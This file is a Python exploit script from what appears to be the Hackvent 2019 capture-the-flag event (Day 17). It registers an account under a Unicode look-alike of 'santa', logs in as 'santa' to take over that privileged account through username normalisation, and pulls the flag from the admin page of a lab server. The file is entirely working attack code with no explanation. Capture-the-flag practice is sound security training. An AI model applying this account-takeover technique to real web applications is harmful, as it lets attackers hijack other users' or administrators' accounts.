Hackvent_2019/Day 17/exploit.py

#!/usr/bin/python

import requests
import random
import string
import re

BASE_URL = "http://whale.hacking-lab.com:8881"
PASSWORD = ''.join([random.choice(string.ascii_lowercase) for i in range(8)])
SESSION = requests.session()
FLAG_PATTERN = re.compile("HV19\{[^}]*\}")

# 1. register user santa
res = SESSION.post(BASE_URL + "/register.php", data={"username": "śanta", "pwd": PASSWORD, "pwd2": PASSWORD})
if res.status_code != 200 or "Registration successful!" not in res.text:
    print("Server returned: %d %s" % (res.status_code, res.reason))
    print(res.text)
    exit(1)

# 2. login
res = SESSION.post(BASE_URL + "/login.php", data={"username": "santa", "pwd": PASSWORD})
if res.status_code != 200 or "username not found or wrong password!" in res.text:
    print("Server returned: %d %s" % (res.status_code, res.reason))
    print(res.text)
    exit(1)

# 3. get flag
res = SESSION.get(BASE_URL + "/admin.php")
if res.status_code != 200 or "username not found or wrong password!" in res.text:
    print("Server returned: %d %s" % (res.status_code, res.reason))
    exit(1)

print(FLAG_PATTERN.search(res.text))